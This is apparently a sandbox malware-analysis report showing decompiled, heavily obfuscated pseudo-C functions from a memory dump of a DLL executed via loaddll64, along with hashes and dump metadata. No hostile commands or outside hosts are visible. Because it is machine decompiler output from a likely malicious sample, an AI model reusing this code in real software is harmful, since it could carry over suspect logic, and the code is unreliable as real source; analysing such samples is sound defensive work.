                                				 *((intOrPtr*)(_t361 + 8)) = __ecx;
                                				_t362 = _t361 - 0x10;
                                				_t378 =  *0x131241a0; // 0x0
                                				_t364 =  *0x13124180; // 0x0
                                				r9d =  *0x13124148; // 0x0
                                				_t381 = _t364;
                                				_t355 =  *0x13124150; // 0x0
                                				r9d = r9d + 1;
                                				_t399 = _t362[0x12];
                                				_t356 = _t355 - 1;
                                				_t392 = _t362[0xe];
                                				_t396 = _t378 - _t362[0xf];
                                				 *0x13124180 = _t364 - 1;
                                				 *0x13124148 = r9d;
                                				r8d =  *(__r9 + __r9 * 2 + __rdx) & 0x000000ff;
                                				_t347 = 0x947 / r8d;
                                				 *0x13124150 = _t356;
                                				_t357 = _t356 * _t378;
                                				r10d = _t362[0x13] & 0x000000ff;
                                				_t385 =  *(_t362[0x14] + 0x385c) *  *(_t362[0x10] + 0x1fe4);
                                				_t181 =  *0x13124120 & 0x0000ffff;
                                				r8d = _t181 & 0x000000ff;
                                				 *0x13124120 = _t181 + 0xffff;
                                				_t362[0xb] = _t385;
                                				 *0x1312416c = 0x1a65 % ( *0x1312416c & 0x0000ffff);
                                				 *(_t399 + r9d * 8) =  *(_t399 + r9d * 8) ^  *0x1312414c;
                                				_t299 =  *0x131241a8; // 0x0
                                				 *_t362 = _t357;
                                				 *0x13124134 =  *0x13124134 & ( *(_t299 + 0x5de) & 0x000000ff) * r8d;
                                				 *((short*)(0x1f8a + _t392 * 2 * 2)) = 0x8dc / ( *(_t392 * 2 + 0x1f8a + _t392 * 2) & 0x0000ffff);
                                				_t248 =  *0x1312416c & 0x0000ffff;
                                				if (_t248 - ( *0x13124123 & 0x000000ff) <= 0) goto 0x130e4472;
                                				_t367 = _t362[0x11];
                                				r9d = r10b & 0xffffffff;
                                				_t300 =  *0x13124158; // 0x0
                                				 *0x13124158 = _t300 * __r9;
                                				_t303 = _t367 -  *0x13124170;
                                				 *0x13124170 = _t303;
                                				 *((char*)(__rdx + _t367 * 2 + _t367)) = (r10b & 0xffffffff) -  *((intOrPtr*)(__rdx + _t367 * 2 + _t367));
                                				 *(_t357 + 0x38 + _t303 * 8) =  *(_t357 + 0x38 + _t303 * 8) | 0x00001a24;
                                				if (_t248 + 1 - ( *0x13124123 & 0x000000ff) > 0) goto 0x130e4420;
                                				_t362[0xb] = _t385 + 1;
                                				_t304 =  *0x131241a0; // 0x0
                                				r8d =  *(_t399 + 8 + _t304 * 8);
                                				if (r8d - 0x200 <= 0) goto 0x130e44e8;
                                				asm("o16 nop [eax+eax]");
                                				_t305 =  *0x13124128; // 0x0
                                				r8d = r8d + 1;
                                				 *((short*)(0x189a +  *_t399 * 2)) = ( *(_t305 + 0x33b8) & 0x0000ffff) -  *((intOrPtr*)(0x189a +  *_t399 * 2)) +  *0x13124170;
                                				 *0x13124150 =  *0x13124150 & 0xfffff8cf;
                                				_t193 =  *0x1312414c; // 0x0
                                				_t331 = _t193 + _t193;
                                				 *((char*)(_t331 + __rdx)) = _t381[0xae4] & 0x000000ff;
                                				if (r8d - 0x200 > 0) goto 0x130e4490;
                                				_t196 =  *0x13124124; // 0x0
                                				 *0x13124124 = _t196 + 1;
                                				_t253 = _t381[_t305] & 0x0000ffff;
                                				if (_t253 == 0x1853) goto 0x130e4764;
                                				_t266 = _t362[0xd];
                                				_t387 = _t392;
                                				r13d = 0xb9f;
                                				r13d = r13d - _t266;
                                				_t362[0xd] = _t266 + 0x1853;
                                				r9d = 0x1e4a;
                                				_t306 =  *0x131241a0; // 0x0
                                				_t308 = __rdx | 0x00000297;
                                				 *(_t306 * 8 + _t357) = _t308;
                                				_t202 =  *0x13124148; // 0x0
                                				 *(_t202 + _t202 + _t202 + _t202 + 0x1f8a) =  *(_t202 + _t202 + _t202 + _t202 + 0x1f8a) & ( *0x13124168 & 0x0000ffff) - r9w;
                                				_t309 = _t308 -  *0x13124198;
                                				r8d =  *0x13124132 & 0x000000ff;
                                				 *0x13124198 = _t309;
                                				r8b = r8b & _t253;
                                				 *0x13124132 = r8b;
                                				r8b = r8b + 1;
                                				_t208 =  *0x13124134; // 0x0
                                				 *0x13124132 = r8b;
                                				 *0x13124134 = _t208 * ( *((intOrPtr*)(0x789210 + _t309 * 4)) + 0x102c);
                                				r13d = r13d - 1;
                                				 *((long long*)(_t396 + _t347 * 8)) = r13d -  *((intOrPtr*)(_t396 + _t347 * 8));
                                				if (r9d != _t253) goto 0x130e467e;
                                				_t379 =  *0x1312414c;
                                				 *((short*)(_t381 + _t347 * 4)) = ( *(_t396 + _t379 * 8) & 0x0000ffff | _t253) -  *((intOrPtr*)(_t381 + _t347 * 4));
                                				_t312 =  *0x131241a8; // 0x0
                                				 *(_t379 + _t312) =  *(_t379 + _t312) & 0x00000082;
                                				_t313 =  *0x1312414c;
                                				r9d = r9d + 1;
                                				 *((intOrPtr*)(_t362[0x10] + _t313 * 4)) = r9d -  *((intOrPtr*)(_t362[0x10] + _t313 * 4)) + _t253;
                                				_t314 =  *0x13124140; // 0x0
                                				_t272 =  *0x13124198; // 0x0
                                				 *(_t314 + (_t313 + _t313 * 2) * 4) =  *(_t314 + (_t313 + _t313 * 2) * 4) & _t272 + _t253 & 0x00000008;
                                				 *((short*)(_t381 - 2 +  *0x13124168 * 2)) = ( *_t381 & 0x0000ffff) / (__rbx + 1);
                                				if (r9d == _t253) goto 0x130e45f0;
                                				_t401 = _t362[0x12];
                                				r10d = _t362[0x13] & 0x000000ff;
                                				if ( *((intOrPtr*)(_t401 +  *0x13124148 * 8)) - _t347 > 0) goto 0x130e4743;
                                				if ( *((long long*)(_t396 + __rdx * 8)) == 0x15be) goto 0x130e4743;
                                				_t362[0xe] = _t362[0xe] - 1;
                                				_t318 =  *0x13124158; // 0x0
                                				 *(_t401 +  *_t401 * 8) =  *(_t401 +  *_t401 * 8) ^ _t318;
                                				 *0x13124158 =  *0x13124158 + 1;
                                				_t219 =  *0x13124148; // 0x0
                                				_t320 =  *0x131241a0; // 0x0
                                				 *((intOrPtr*)(_t401 + _t318 * 8 + 0x40)) =  *((intOrPtr*)(_t401 + _t318 * 8 + 0x40)) + _t219 + 0x28;
                                				_t348 = _t347 * _t320;
                                				_t321 =  *0x13124138; // 0x0
                                				 *((long long*)(_t321 + __rdx * 8)) = 0xffffed8a;
                                				_t371 =  *0x13124160; // 0x0
                                				 *(_t371 + _t387) =  ~( *(_t371 + _t387) & 0x000000ff) - (_t253 & 0x000000ff) * 0x1a;
                                				_t372 = _t362[0x14];
                                				asm("cdq");
                                				 *(_t372 + _t348 * 4) = 0x189b /  *(_t372 + _t348 * 4);
                                				 *((intOrPtr*)( *_t362 + (_t387 - 1) * 8)) =  *((intOrPtr*)( *_t362 + (_t387 - 1) * 8)) + _t321;
                                				r9d = 0x1e4a;
                                				if (_t253 + 1 != 0x1853) goto 0x130e4530;
                                				r13d = _t362[0xe];
                                				_t255 =  *0x1312416c & 0x0000ffff;
                                				_t377 = _t362[0xf];
                                				asm("cdq");
                                				r8d = _t255;
                                				 *((char*)(_t372 + _t377)) = (0x906 - _t255) % ( *(_t331 + _t377) & 0x000000ff);
                                				 *0x1312416c =  *0x1312416c + 0xffff;
                                				_t322 =  *0x13124140; // 0x0
                                				asm("cdq");
                                				 *(_t322 + (_t321 + _t321 * 2) * 4) = 0x134f /  *(_t322 + (_t321 + _t321 * 2) * 4);
                                				 *0x13124158 =  *0x13124158 +  *((intOrPtr*)(0x1bcd + (_t322 + _t322 * 2) * 8));
                                				 *0x131241a0 =  *0x131241a0 | _t362[0xd] * 0x0000014e;
                                				 *(r13d + _t377) =  *(r13d + _t377) ^ ( *0x13124170 & 0x000000ff | r10b);
                                				_t324 =  *0x131241a8; // 0x0
                                				 *((char*)(_t324 + _t348)) = 0;
                                				return 0x152d;
                                			}


                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0c341637e56212d5c0dddac194ed3042e670afe7c835065e812139a2840dfd2
                                • Instruction ID: e2ad2443a3a29f8fd4e1339d52e76f922eaf3f6aa45018259181752874a205ce
                                • Opcode Fuzzy Hash: b0c341637e56212d5c0dddac194ed3042e670afe7c835065e812139a2840dfd2
                                • Instruction Fuzzy Hash: 00E1E732658EA989F7108F1AF8402797BB5F758769F264136DA8CA3760DF3CE060C714
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E00007FFC7FFC130E6820(long long __rbx, void* __rcx, void* __rdx, long long __rbp, signed int* __r9, void* __r10, void* __r11, long long __r12, signed int _a8, long long _a16, long long _a24, long long _a32, signed int _a40, signed int _a56, signed int _a64, signed int _a72) {
                                				void* _v40;
                                				signed int _v48;
                                				signed int _v56;
                                				signed int _v60;
                                				signed int _v64;
                                				signed int _v68;
                                				signed int _v72;
                                				signed int _v76;
                                				signed int _v80;
                                				signed int _v84;
                                				signed int _v88;
                                				signed int* _v96;
                                				signed int _v104;
                                				signed int _v112;
                                				signed int _v120;
                                				signed int _v128;
                                				signed int _v136;
                                				signed int _v144;
                                				signed int _v152;
                                				signed int _v160;
                                				signed int _v168;
                                				signed int _v176;
                                				signed int _v184;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __r13;
                                				void* __r14;
                                				void* __r15;
                                				signed int _t147;
                                				signed int _t157;
                                				signed int _t162;
                                				signed int _t171;
                                				signed int _t174;
                                				signed int _t196;
                                				signed int _t206;
                                				signed int _t210;
                                				signed int _t222;
                                				signed int _t224;
                                				signed int _t234;
                                				signed long long _t242;
                                				signed int* _t245;
                                				void* _t259;
                                				void* _t260;
                                				signed int* _t267;
                                				void* _t273;
                                				void* _t274;
                                				void* _t275;
                                
                                				_t271 = __r12;
                                				_t267 = __r9;
                                				_t261 = __rbp;
                                				_t255 = __rdx;
                                				_a24 = __rbx;
                                				_a32 = __rbp;
                                				r10d = __rcx - 0x1270;
                                				r11d = _a64;
                                				_t245 = __r9;
                                				r9d = _a72;
                                				_t222 = _a40 + 0x106;
                                				r9d = r9d + 0xffffc5a7;
                                				_a56 = _t222;
                                				r14d = __r11 - 0x2598;
                                				_v76 = r9d;
                                				_a72 = r10d;
                                				_v88 = r14d;
                                				_t206 = __rdx + 0x17e6;
                                				_a8 = _t206;
                                				r15d = __rdx + 0x495;
                                				_a40 = r14d;
                                				r13d = __r11 + 0xffd;
                                				_v68 = r15d;
                                				if (r10d - _t274 + 0x36e7 >= 0) goto 0x130e6947;
                                				__r9[0xa0] = 0x39c6;
                                				__r9[0xa1] = 0x295f;
                                				_t248 = __r9[0xc];
                                				 *((intOrPtr*)(__r9[0xc] + 0x58)) =  *((intOrPtr*)(__r9[0xc] + 0x58)) - (__r9[0x12] | 0x00001f2c);
                                				__r9[0xa2] = 8;
                                				if (__r9[0x4c] + 0x3bc - 0x27b2 < 0) goto 0x130e6931;
                                				_t266 = __r9[0x7e] * 0x27ae;
                                				if (0x27b3 - __rdx <= 0) goto 0x130e6920;
                                				__r9[0x28] = __r9[0x7e] * 0x27ae;
                                				__r9[0xa3] = 0x18;
                                				goto 0x130e6d33;
                                				_a16 = __r12;
                                				r8d = _t206;
                                				_v80 = _t206;
                                				if (_t206 - (r15d * r14d ^ r14d) < 0) goto 0x130e6c67;
                                				_t147 =  *__r9;
                                				_v84 = _t147;
                                				_t234 = _t147;
                                				if (_t234 != 0) goto 0x130e6c48;
                                				_v72 = 0x3189 + r15d * 0x2103;
                                				_v64 = r15d * 0xfffff6e7 & 0x00002103;
                                				_v60 = __r9 - 0x30d5;
                                				_v56 = r11d * 0x30d5;
                                				_v48 = (_t206 & 0x00003189) + 0x36e7;
                                				_t157 = __r9[0x1c];
                                				r8d = __r11 + 0xffd;
                                				r13d = __r9[0x6e];
                                				r9d = _t157;
                                				r9d = r9d & r15d;
                                				r11d = r11d - _a56;
                                				r15d = __r9[0x38];
                                				r11d = r11d ^ 0x000027b2;
                                				r14d = __r9[0x50];
                                				r13d = r13d ^ _t222;
                                				r13d = r13d & __r9[0x20];
                                				r14d = r14d - r10d;
                                				r12d = r15d;
                                				r15d = r15d | __r9[0x8a];
                                				r10d = r10d + 0xffffc5a7;
                                				r12d = r12d ^ __r9[0x86];
                                				r12d = r12d ^ __r9[0x16];
                                				r8d = _v88 * 0x30d5;
                                				_v96 = __r9;
                                				r9d = r9d * _t222;
                                				_v104 = __r9[0x74] + 0x37e1;
                                				_v112 = _t206 + __r9[0x48];
                                				_v120 = (_t157 ^ r8d) * 0x2032;
                                				_v128 = r15d;
                                				_v136 = r11d;
                                				_v144 = _v72;
                                				_v152 = r14d;
                                				_v160 = r10d;
                                				_v168 = r12d;
                                				_v176 = r13d;
                                				_v184 = r14d & 0x000036e7;
                                				_t162 = E00007FFC7FFC130E1B10(_t248, __rdx, _t260, __rbp, _t274, _t275);
                                				_t196 = _a40;
                                				r14d = _t162;
                                				_t224 = _t245[0x32];
                                				r15d = _v68;
                                				r10d = _t245[0x18];
                                				r10d = r10d - r14d;
                                				r11d = _t245[0x16];
                                				r12d = _a72;
                                				r11d = r11d & 0x0000228c;
                                				_v88 = _t162;
                                				r10d = r10d * r12d;
                                				_t245[0x24] = _t245[0x24] - _t245[0x7e] - 0x27b3;
                                				_a56 = _a56 ^ _t224 - _t196 - 0x000027b2;
                                				_a40 = _t196 - 0x1f2c;
                                				r13d = 0x37b0;
                                				r9d = r13d;
                                				r9d = r9d - _t245[0x78];
                                				r9d = r9d & 0x000027ae;
                                				r8d = _t245[0xc];
                                				r8d = r8d & _t245[0x50];
                                				r12d = r12d ^ 0x000027ae;
                                				_v96 = _t245;
                                				_v104 = _t245[0x4c] | 0x00001f2c;
                                				_v112 = r8d;
                                				r8d = _v56;
                                				_v120 = r9d;
                                				r9d = _v60;
                                				_v128 = (_t224 | _t245[4]) + 0x228c;
                                				_v136 = (r14d ^ _a8) + r13d;
                                				_v144 = r10d;
                                				_v152 = r11d;
                                				_v160 = _t245[0x48] - r15d;
                                				_v168 = (_t245[0x54] | r13d) * r15d;
                                				_v176 = r12d;
                                				_v184 = _v64;
                                				_t171 = E00007FFC7FFC130F8680((_a64 ^ _t245[0x7e]) + 0x2598, _t245, _t245[0x7e] - 0x27b3, __rdx, _t260, _t266, _t267, __r10, __r12, _t273, _t275);
                                				_v84 = _v84 + 2;
                                				r10d = _t171;
                                				_t210 = _a8;
                                				r11d = _a64;
                                				_a72 = _t171;
                                				if (_t234 == 0) goto 0x130e69d6;
                                				r8d = _v80;
                                				r9d = _v76;
                                				r8d = r8d + 4;
                                				_v80 = r8d;
                                				if (r8d - (r15d * r14d ^ r14d) >= 0) goto 0x130e6970;
                                				_t242 = r10d;
                                				_v48 = _t242;
                                				if (_t210 == _t242 * _t245[0x54] * _t245[0x40]) goto 0x130e6d24;
                                				r12d = r14d;
                                				r12d = r12d | r10d;
                                				r8d = _t245[0x12];
                                				r8d = r8d +  *_t245;
                                				r8d = r8d | 0x00001f2c;
                                				r9d = r9d - _t245[0x88];
                                				_v160 = r15d * r14d ^ _a40;
                                				_v168 = (__r10 - 0x23f6) * r14d;
                                				_v176 = _t245;
                                				_v184 = _t245[0x2e] |  *_t245;
                                				_t174 = E00007FFC7FFC131009D0(r12d, r15d ^ r13d ^ r14d, _t245, _t242 * _t245[0x54] * _t245[0x40], _t255, _t259, _t260, _t261, _t266, _t267, __r11, _t271, _t274, _t275);
                                				r9d = _v76;
                                				r13d = _t174;
                                				if (_t210 + 4 != _v48 * _t245[0x54] * _t245[0x40]) goto 0x130e6cb0;
                                				goto 0x130e6d2b;
                                				return _t273 - 0x2f8;
                                			}


                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ec31a42c203a2aa718200237ebeba28935719d637934978fc03d1ef27e967e0
                                • Instruction ID: bdaa46946065e6f22a6f2efa6e7ae3414611c21df0595d47a13ced32d73b366f
                                • Opcode Fuzzy Hash: 1ec31a42c203a2aa718200237ebeba28935719d637934978fc03d1ef27e967e0
                                • Instruction Fuzzy Hash: D2D187B76182C58BD325CF25E44579ABBA4F388B98F044039DF8997B98DB38E954CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 98%
                                			E00007FFC7FFC130FF290(signed int __ecx, signed int __edx, long long __rbx, long long __rdi, signed int __r8, signed int __r9, signed int _a8, signed int _a16, long long _a24, long long _a40, signed int _a48, signed long long _a56, signed int _a64, signed int _a72, intOrPtr _a80, intOrPtr _a88) {
                                				long long _v56;
                                				void* _t154;
                                				void* _t157;
                                				intOrPtr* _t160;
                                				long long _t162;
                                				long long _t165;
                                				signed long long _t173;
                                				signed long long _t188;
                                				signed long long _t198;
                                				signed long long _t211;
                                				signed long long _t220;
                                				long long _t226;
                                				signed long long _t229;
                                				void* _t232;
                                				signed long long _t236;
                                				signed long long _t242;
                                				signed long long _t243;
                                				signed int _t244;
                                				signed long long _t246;
                                
                                				_a8 = __ecx;
                                				_t160 = _a40;
                                				r14d = r8w & 0xffffffff;
                                				r10d = _a64;
                                				r11d = 0;
                                				r15d = __edx & 0x0000ffff;
                                				_t165 =  *((intOrPtr*)(_t160 + 0x158));
                                				r12d = __ecx;
                                				_a16 = __ecx;
                                				 *(_t160 + 0x110) =  *(_t160 + 0x110) - ( *(_t160 + 0xc8) | _t246);
                                				 *(_t232 - 0x18) = _t246;
                                				r8d =  *( *((intOrPtr*)(_t160 + 0x1a0)) + 0x130);
                                				_t211 = _a56;
                                				r8d = r8d - 0x23f7;
                                				_t244 = r8d;
                                				if (_t244 - _t211 >= 0) goto 0x130ff685;
                                				r9d = _a48;
                                				_a24 = __rbx;
                                				_t162 = _t165;
                                				_v56 = __rdi;
                                				_t226 = _t165;
                                				_a40 = _t165;
                                				asm("o16 nop [eax+eax]");
                                				r8d =  *(_t160 + 0x150);
                                				_t236 = __r8 ^ 0x0000151e;
                                				if (_t236 - _t211 < 0) goto 0x130ff366;
                                				r9d = __ecx;
                                				_t242 = __r9 ^ _t211;
                                				if (0x36e8 - _t236 <= 0) goto 0x130ff350;
                                				 *(_t160 + 0x198) = _t242;
                                				r9d = _a48;
                                				 *((intOrPtr*)(_t160 + 0x70)) =  *((intOrPtr*)(_t160 + 0x70)) + 0xffffd84e - _t246;
                                				r8d =  *(_a88 + _t244) & 0x000000ff;
                                				r8b = r8b - _a80;
                                				r8b = r8b ^ _a72;
                                				 *( *((intOrPtr*)(_t160 + 0x50)) + _t162 + _t244) = r8b;
                                				if (r10d == 8) goto 0x130ff636;
                                				r15d =  *( *((intOrPtr*)(_t160 + 0x50)) + _t162 + _t244) & 0x000000ff;
                                				 *(_t160 + 0x1f0) =  *(_t160 + 0x1f0) ^  *(_t160 + 0x20) * 0x000027ae;
                                				r15b = r15b & (0x00000001 << r10d) - 0x00000001;
                                				if ( *(_t160 + 0xc8) -  *(_t160 + 0x18) <= 0) goto 0x130ff3f2;
                                				 *( *((intOrPtr*)(_t160 + 0x30)) + 0x1e0) =  *(_t160 + 0x230) ^ __r9;
                                				_t173 =  *((intOrPtr*)(_t160 + 0x40));
                                				if (( *(_t173 + 0xb0) ^ 0x00001052) - 0x37e1 > 0) goto 0x130ff41f;
                                				 *(_t160 + 0x198) =  *(_t160 + 0x198) + _t173 * 0x125d;
                                				 *(_t160 + 0x198) =  *(_t160 + 0x198) + 0xffffd84e - _t242;
                                				if (r10d == 0) goto 0x130ff5f8;
                                				r10d = r15b & 0xffffffff;
                                				r10b = r10b >> _t162 - 1;
                                				r10b = r10b & ( *( *((intOrPtr*)(_t160 + 0x1c8)) + 0x188) & 0x000000ff ^ 0x00000032);
                                				 *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x30)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x30)) + 0x198)) + (_t229 | __r9);
                                				if ( *(_t160 + 0x150) == 0x23f6) goto 0x130ff495;
                                				 *( *((intOrPtr*)(_t160 + 0x30)) + 0xc8) =  *( *((intOrPtr*)(_t160 + 0x30)) + 0xc8) ^  *( *_t160 + 0xe0);
                                				 *( *_t160 + 0xe0) =  *( *_t160 + 0xe0) + 1;
                                				r8d =  *( *((intOrPtr*)(_t160 + 0x30)) + 0x130) * 0x582b602f;
                                				_t154 = r8d - 0x3a5a;
                                				if (_t154 > 0) goto 0x130ff4d9;
                                				r9d = r14w & 0xffffffff;
                                				_t243 = _t242 + 0x36e7;
                                				r8d = 0x3a5b - r8d;
                                				if (_t154 != 0) goto 0x130ff4c7;
                                				r9d = _a48;
                                				 *(_t160 + 0x18) =  *(_t160 + 0x18) | _t243;
                                				r11d = r11d + 1;
                                				if (r11d == 0) goto 0x130ff533;
                                				 *(_t160 + 0xc8) =  *(_t160 + 0x1d0) ^ __r9;
                                				_t220 =  *((intOrPtr*)(_t160 + 0x50));
                                				 *(_t220 + _t226) = ( *(_t220 + _t226) & 0x000000ff) + ( *(_t220 + _t226) & 0x000000ff) | r10b;
                                				if (( *( *((intOrPtr*)(_t160 + 0x140)) + 0x130) ^ 0x0000066f) != 0x37e1) goto 0x130ff56c;
                                				 *(_t160 + 0x100) =  *(_t160 + 0x10) ^ 0x000027ae;
                                				goto 0x130ff56c;
                                				 *(_t160 + 0x198) =  *((intOrPtr*)(_t160 + 0xe8)) + 0x3a59;
                                				_t188 =  *((intOrPtr*)(_t160 + 0x50));
                                				 *(_t226 + _t188) = r10b;
                                				 *(_t160 + 0x110) =  *(_t160 + 0x110) + (_t188 | __r9);
                                				 *((intOrPtr*)(_t160 + 0x48)) =  *((intOrPtr*)(_t160 + 0x48)) -  *(_t160 + 0xa0) + __r9;
                                				 *(_t160 + 0x1f0) =  *(_t160 + 0x1f0) +  *(_t160 + 0xa0) - 0x3a59;
                                				_t157 = r11d - (_t220 ^ 0x00003295);
                                				if (_t157 != 0) goto 0x130ff5e3;
                                				r12d = r12d + 1;
                                				 *((long long*)(_t160 + 0x80)) = 0x33ff;
                                				r11d =  *( *((intOrPtr*)(_t160 + 0x1c8)) + 0x130);
                                				r11d = r11d ^ 0x000023f7;
                                				_t198 =  *((intOrPtr*)(_t160 + 0x1c0)) + 0x110;
                                				 *(_t160 + 0x228) = _t198;
                                				 *(_t160 + 0xa0) = _t198 ^ _t243;
                                				if (_t157 != 0) goto 0x130ff440;
                                				r10d = _a64;
                                				 *(_t160 + 0x100) =  *(_t160 + 0x100) * ( *(_t160 + 0x110) | 0x00002032);
                                				 *((intOrPtr*)(_t160 + 0x1e0)) =  *((intOrPtr*)(_t160 + 0x1e0)) +  *((intOrPtr*)(_t160 + 0x1b8)) + 0x228c;
                                				 *(_t160 + 0x198) =  *(_t160 + 0x198) + ( *(_t160 + 0xc8) | _t243);
                                				 *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x1c0)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x1c0)) + 0x198)) +  *((intOrPtr*)(_t160 + 0x218));
                                				 *((long long*)(_t160 + 0x218)) =  *((long long*)(_t160 + 0x218)) - 1;
                                				if (_t244 + 1 - _a56 < 0) goto 0x130ff330;
                                				r12d =  ==  ? _a16 + _a56 : r12d;
                                				return r12d;
                                			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9d4ac3d9a9c46076188db0bcfc194ca47d344c2568f07f4fddbe795ed10baa4
                                • Instruction ID: 8ca8fdda2c32bd46c3a4bedef7127ff3fad0931b0435598f8ea2e4e4ef044b06
                                • Opcode Fuzzy Hash: e9d4ac3d9a9c46076188db0bcfc194ca47d344c2568f07f4fddbe795ed10baa4
                                • Instruction Fuzzy Hash: 87A19B72608A9482EB15CB15E8A43BA7BE9F7C8B94F0A81B5DF8E47794CF38C055C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130E1B10(void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r14, long long __r15, long long _a8, long long _a16, long long _a24, signed int _a32, signed int _a64, signed int _a72, signed int _a80, long long _a128) {
                                				long long _v40;
                                				signed int _v56;
                                				signed int _v64;
                                				signed int _v72;
                                				long long _v80;
                                				intOrPtr _v88;
                                				signed int _v96;
                                				signed int _v104;
                                				signed int _v112;
                                				signed int _v120;
                                				signed int _v128;
                                				signed int _v136;
                                				void* __rbx;
                                				signed int _t140;
                                				signed int _t153;
                                				signed int _t172;
                                				void* _t180;
                                				void* _t185;
                                				void* _t190;
                                				intOrPtr _t206;
                                				signed long long _t213;
                                				long long _t215;
                                				signed long long _t219;
                                				signed long long _t225;
                                				intOrPtr _t228;
                                				void* _t231;
                                				intOrPtr _t241;
                                				void* _t242;
                                				void* _t243;
                                
                                				_a32 = r9d;
                                				r12d = _a80;
                                				r10d = __rcx + 0xd1;
                                				r13d = _a72;
                                				r12d = r12d + 0xffffed95;
                                				_t215 = _a128;
                                				r13d = r13d + 0xb4;
                                				r9d = __rdx - 0x23f6;
                                				_t172 = __rdx + 0x119f;
                                				_a32 = _t172;
                                				if (r9d - __rcx - 0x119f > 0) goto 0x130e1ed4;
                                				if (r9d - _t243 - 0x1086 > 0) goto 0x130e1d7a;
                                				r11d = 0;
                                				if ( *((intOrPtr*)(_t215 + 0x270)) - r11d <= 0) goto 0x130e1d59;
                                				if ( *((long long*)(_t215 + 0x70)) - 0x228c > 0) goto 0x130e1bbc;
                                				 *( *(_t215 + 0x1c0) + 0x1b0) =  *( *(_t215 + 0x1c0) + 0x1b0) ^ 0x00005b5c;
                                				r10d = 0;
                                				_t185 =  *((intOrPtr*)(_t215 + 0x274)) - r10d;
                                				if (_t185 <= 0) goto 0x130e1ccb;
                                				 *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x278) * 4) =  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x278) * 4) ^  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x27c) * 4);
                                				if (_t185 >= 0) goto 0x130e1c03;
                                				_t228 =  *((intOrPtr*)(_t215 + 0x210));
                                				r8d =  *(_t228 +  *(_t215 + 0x278) * 4);
                                				if ((( *(_t215 + 0x28c) & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 == 0) goto 0x130e1c1c;
                                				asm("inc ecx");
                                				 *((intOrPtr*)(_t228 +  *(_t215 + 0x27c) * 4)) =  *((intOrPtr*)(_t228 +  *(_t215 + 0x27c) * 4)) + r8d;
                                				if ( *((long long*)(_t215 + 0x220)) != 0x27b2) goto 0x130e1c4e;
                                				_t219 =  *(_t215 + 0x218) ^ 0x0000329d;
                                				 *(_t215 + 0x10) =  *(_t215 + 0x10) * _t219;
                                				_t241 =  *((intOrPtr*)(_t215 + 0x1a0));
                                				if ( *(_t241 + 0x188) * 0xd50c7428 - 0x23f6 < 0) goto 0x130e1c93;
                                				 *(_t215 + 0x198) =  *(_t215 + 0x100) ^ 0x00002103;
                                				if (0x23f7 - _t219 <= 0) goto 0x130e1c77;
                                				r10d = r10d + 1;
                                				_t153 =  *(_t215 + 0x238);
                                				asm("cdq");
                                				 *(_t215 + 0x278) = ( *(_t215 + 0x278) + 1) % _t153;
                                				asm("cdq");
